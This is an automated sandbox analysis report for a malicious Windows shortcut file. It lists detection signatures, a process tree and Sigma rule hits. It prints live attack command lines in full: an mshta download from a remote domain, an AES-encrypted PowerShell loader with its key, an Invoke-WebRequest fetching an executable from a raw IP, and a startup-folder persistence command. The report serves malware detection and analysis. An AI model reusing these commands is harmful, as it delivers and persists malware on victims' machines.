Windows Analysis Report
R4qP4YM0QX.lnk

Overview

General Information

Sample name:R4qP4YM0QX.lnk
renamed because original name is a hash value
Original sample name:c994e4260593f7a34502021234dae6a9.lnk
Analysis ID:1577882
MD5:c994e4260593f7a34502021234dae6a9
SHA1:79ce5393d4fa09d39588aca57653b65e46bceb3b
SHA256:f87591ca3e590371796ced4bd9df58da5dc7822faae2520886470d1307b69db9
Tags:lnk, user-abuse_ch

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • forfiles.exe (PID: 5336 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 612 cmdline: . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 1476 cmdline: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANH MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($pzaMyJg){return -split ($pzaMyJg -replace '..', '0x$& ')};$KUtXL = clean('78219AD4FAFD1313B3312ABC82CE34A02A4A60C02EBEBF66EF22D1AE9E38EAB935975C5E265945ACF8F43EA3217D7E04446B93E8935F8A650373163DF23D9095D2EE36D9AE183830DA3383A93777009FFE992C94365431E85C9A4BD19706DE0F651039764F10D911FF62FC644C72D4568DEB22276F734D73AB4E6A18097DC3C4C7480CFE127D41CB49FF2295F7E03078C98E7DBADDD24DD3982D0786BCE84A387192B080A130BF4762AFEFC2CE03F92D6FBB6AEA0B223A2119ABFE11214C698E82BE06E8F9B342CD1C7F089050675451B7455B935BA443206FDCD04C4D942F4620687D61DCE7B4896DF4982AD1CAA4709913A3BFBA7868829327FE80430B6CFF032AFE6E144EA3B7EEEB9B1ED8A7D2EE845D26410B8D045FB1A5B3BF8A7AB9BB3E0D066452978BBC7F125835600824DDDC81D38A5209F1A4091DD7B7C1D04307CA0FB5F05575A79F927FE51C241234BD04F89918070EE2E5287BE446F1920BF8A252AD8998C544A249048AF75DB89D6D0B6A8AD543DEEB0889D275BCB8B92841DAD4290E2DC88D65C9630CC47CCD6F299BB0BED9C404CBD5A82ADE61B6393BD1C517406CEC6BBF66E379EEFE6CAB17ABC4FE3B95CD7AFF7FC1DDD9A920A6191FB37C8EC30A4A7667A113B678672013F0BABB0C4B9F43C87FC854B2E47772CACC37D2ADF2664824AF9C4DB947633D07DD47E03C0BD686B11FD76ABC45F1D4050F3E57080C852D506F56B49340243D2E73DD50FA076F63A84BC99C7519ADC821AC6311B2CEDD59508884AE75F53F4A78FF89CC03F899651C73F3989A11092A199BD1AA8DCCA27B2B7D39A6A8A8A1E91E34A26196775ACBEADB106D5F827D0A5A5B44D891E4B333CA7F6AFDC7725D5BD9CEC0B11138E8AB3AFBEEE6D44F83D151C14A67A3497E17312DF7AB7BD3DCB1D33AC9AA0402ED89756C4B881508E863BE482E8AEFB806649D738E7DCE2814888C8EE1E5F0C849829B3A00AA1A7EF6E1C6498222EC93BF8FED737DE9D7576AFAE854850BFF492E80199552DDEF0675B892B327717CB5AF4CFFBB1A5D7C623A2768AA32CC72FBCA150EC0786993E294FA0F154E9A90E9394DC84E513BB54ED63CDE8CDDBDAE0AC392E93E0A5AF01CFE86C53D9F595CED51532CB14F4D98D7FCD5EF8B286785CABB97B5793CDFDC9D05F90353B05939CAC7A6F8938A1073C7190ED1E372A484F1764DEAAC0CB173B868C0330983DCADEB563002EE18FDD0662F1117381739EC36C7AC7F333B
3D0F9883A3875F9AD6194D6264748161A5E8FC943C8D9CC7F4F4CC6DFFC926B8CB32A52C8CE0BBCD0CC4E6128DEFB5ECED7F3A9786CB2F36C6B53B84C319FA011D47CD55D4FC3A8BFD9BBD84A9736B1122314172FB69B308F5380A65BD8E70E37A3C3660FAB16D1CA3609ED74F25793CB21D2C45B081D8E2F72DCDDBE269188B42541A2D5FE30CBDAE1EA3E31418FACA2F5448EECBFD69D9231F9C19ABC5BE36A8776A1319460EE488396DDC19905B1F4A80C52596B85B2B0BFA14FED4C0AEC8366A87710B144BAA0ECA013BF68B764FD59CF871FAE15AFAFE6A3E29CF3BEDEFDDF29675BB14D585BB959E86034C7525C3572536DCCFC109FA80925932BA43B5436E89F7BFE06F033C54CF7252EE9FF9C4C977EDE18AC548BD5F848B384D44C8DC955EF7A663E276183DB51D3513687F1D7D1B10B0B09043B0D2D9110AFA20C03738F1593BB49422FF1EDE5B067366BB176DAC56DF968F791A5FADF7F8C994C4EE8E99902C57B90344E31873504C3C9DA5D1A07DB9ECF1');$IiqxjTB = [System.Security.Cryptography.Aes]::Create();$IiqxjTB.Key = clean('747464414A50546B43514F4F4B7A5077');$IiqxjTB.IV = New-Object byte[] 16;$UdJKkrroG = $IiqxjTB.CreateDecryptor();$mhREwMEES = [Text.Encoding]::UTF8.GetString($UdJKkrroG.TransformFinalBlock($KUtXL, 0,$KUtXL.Length)); & $mhREwMEES.Substring(0,3) $mhREwMEES.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msedge.exe (PID: 7280 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\user\AppData\Roaming\New_2025.webp MD5: BF154738460E4AB1D388970E1AB13FAB)
        • msedge.exe (PID: 7492 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2208,i,10322920844416449254,4510193414776535849,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
      • PefjSkkhb.exe (PID: 7052 cmdline: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" MD5: 567DE19C0E7E3A1FC845E51AC1C1D5D8)
        • powershell.exe (PID: 5612 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 9152 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 9160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Guard.exe (PID: 416 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
      • cmd.exe (PID: 7052 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 3652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 7508 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate --single-argument C:\Users\user\AppData\Roaming\New_2025.webp MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 7816 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8416 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6584 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8464 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6864 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 8648 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7296 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 8660 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7296 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • msedge.exe (PID: 9120 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6812 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • wscript.exe (PID: 7448 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 6244 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 612
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x1aaa74:$b1: ::WriteAllBytes(
  • 0x1ab223:$b1: ::WriteAllBytes(
  • 0xc23:$b3: ::UTF8.GetString(
  • 0x1948:$b3: ::UTF8.GetString(
  • 0x2535:$b3: ::UTF8.GetString(
  • 0x86cf:$b3: ::UTF8.GetString(
  • 0x929b:$b3: ::UTF8.GetString(
  • 0x33c59:$b3: ::UTF8.GetString(
  • 0x34841:$b3: ::UTF8.GetString(
  • 0x35634:$b3: ::UTF8.GetString(
  • 0x363db:$b3: ::UTF8.GetString(
  • 0x3d986:$b3: ::UTF8.GetString(
  • 0x3e552:$b3: ::UTF8.GetString(
  • 0x3f127:$b3: ::UTF8.GetString(
  • 0x41277:$b3: ::UTF8.GetString(
  • 0x41ca3:$b3: ::UTF8.GetString(
  • 0x68be1:$b3: ::UTF8.GetString(
  • 0x68d4d:$b3: ::UTF8.GetString(
  • 0x8463b:$b3: ::UTF8.GetString(
  • 0x84c27:$b3: ::UTF8.GetString(
  • 0x1b0233:$b3: ::UTF8.GetString(

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 9152, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 416, ProcessName: Guard.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7052, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 9152, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANH, CommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANH, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 612, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANH, ProcessId: 1476, ProcessName: mshta.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7052, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 9152, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7052, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 5612, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($pzaMyJg){return -split ($pzaMyJg -replace '..', '0x$& ')};$KUtXL = clean('78219AD4FAFD1313B3312ABC82CE34A02A4A60C02EBEBF66EF22D1AE9E38EAB935975C5E265945ACF8F43EA3217D7E04446B93E8935F8A650373163DF23D9095D2EE36D9AE183830DA3383A93777009FFE992C94365431E85C9A4BD19706DE0F651039764F10D911FF62FC644C72D4568DEB22276F734D73AB4E6A18097DC3C4C7480CFE127D41CB49FF2295F7E03078C98E7DBADDD24DD3982D0786BCE84A387192B080A130BF4762AFEFC2CE03F92D6FBB6AEA0B223A2119ABFE11214C698E82BE06E8F9B342CD1C7F089050675451B7455B935BA443206FDCD04C4D942F4620687D61DCE7B4896DF4982AD1CAA4709913A3BFBA7868829327FE80430B6CFF032AFE6E144EA3B7EEEB9B1ED8A7D2EE845D26410B8D045FB1A5B3BF8A7AB9BB3E0D066452978BBC7F125835600824DDDC81D38A5209F1A4091DD7B7C1D04307CA0FB5F05575A79F927FE51C241234BD04F89918070EE2E5287BE446F1920BF8A252AD8998C544A249048AF75DB89D6D0B6A8AD543DEEB0889D275BCB8B92841DAD4290E2DC88D65C9630CC47CCD6F299BB0BED9C404CBD5A82ADE61B6393BD1C517406CEC6BBF66E379EEFE6CAB17ABC4FE3B95CD7AFF7FC1DDD9A920A6191FB37C8EC30A4A7667A113B678672013F0BABB0C4B9F43C87FC854B2E47772CACC37D2ADF2664824AF9C4DB947633D07DD47E03C0BD686B11FD76ABC45F1D4050F3E57080C852D506F56B49340243D2E73DD50FA076F63A84BC99C7519ADC821AC6311B2CEDD59508884AE75F53F4A78FF89CC03F899651C73F3989A11092A199BD1AA8DCCA27B2B7D39A6A8A8A1E91E34A26196775ACBEADB106D5F827D0A5A5B44D891E4B333CA7F6AFDC7725D5BD9CEC0B11138E8AB3AFBEEE6D44F83D151C14A67A3497E17312DF7AB7BD3DCB1D33AC9AA0402ED89756C4B881508E863BE482E8AEFB806649D738E7DCE2814888C8EE1E5F0C849829B3A00AA1A7EF6E1C6498222EC93BF8FED737DE9D7576AFAE854850BFF492E80199552DDEF0675B892B327717CB5AF4CFFBB1A5D7C623A2768AA32CC72FBCA150EC0786993E294FA0F154E9A90E9394DC84E513BB54ED63CDE8CDDBDAE0AC392E93E0A5AF01CFE86C53D9F595CED51532CB14F4D98D7FCD5EF8B286785CABB97B5793CDFDC9D05F90353B05939CAC7A6F8938A1073C7190ED1E372A484F1764DEAAC0CB173B868C0330983DCADEB563002EE18FDD0662F11173817
39EC36C7AC7F333B3D0F9883A3875F9AD6194D6264748161A5E8FC943C8D9CC7F4F4CC6DFFC926B8CB32A52C8CE0BBCD0CC4E6128DEFB5ECED7F3A9786CB2F36C6B53B84C319FA011D47CD55D4FC3A8BFD9BBD84A9736B1122314172FB69B308F5380A65BD8E70E37A3C3660FAB16D1CA3609ED74F25793CB21D2C45B081D8E2F72DCDDBE269188B42541A2D5FE30CBDAE1EA3E31418FACA2F5448EECBFD69D9231F9C19ABC5BE36A8776A1319460EE488396DDC19905B1F4A80C52596B85B2B0BFA14FED4C0AEC8366A87710B144BAA0ECA013BF68B764FD59CF871FAE15AFAFE6A3E29CF3BEDEFDDF29675BB14D585BB959E86034C7525C3572536DCCFC109FA80925932BA43B5436E89F7BFE06F033C54CF7252EE9FF9C4C977EDE18AC548BD5F848B384D44C8DC955EF7A663E276183DB51D3513687F1D7D1B10B0B09043B0D2D9110AFA20C03738F1593BB49422FF1EDE5B067366BB176DAC56DF968F791A5FADF7F8C994C4EE8E99902C57B90344E31873504C3C9DA5D1A07DB9ECF1');$IiqxjTB = [System.Security.Cryptography.Aes]::Create();$IiqxjTB.Key = clean('747464414A50546B43514F4F4B7A5077');$IiqxjTB.IV = New-Object byte[] 16;$UdJKkrroG = $IiqxjTB.CreateDecryptor();$mhREwMEES = [Text.Encoding]::UTF8.GetString($UdJKkrroG.TransformFinalBlock($KUtXL, 0,$K
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7448, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5612, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($pzaMyJg){return -split ($pzaMyJg -replace '..', '0x$& ')};$KUtXL = clean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iqxjTB = [System.Security.Cryptography.Aes]::Create();$IiqxjTB.Key = clean('747464414A50546B43514F4F4B7A5077');$IiqxjTB.IV = New-Object byte[] 16;$UdJKkrroG = $IiqxjTB.CreateDecryptor();$mhREwMEES = [Text.Encoding]::UTF8.GetString($UdJKkrroG.TransformFinalBlock($KUtXL, 0,$K
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7448, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 6244, ProcessName: SwiftWrite.pif
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 612, TargetFilename: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7052, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 5612, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7052, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 5612, ProcessName: powershell.exe
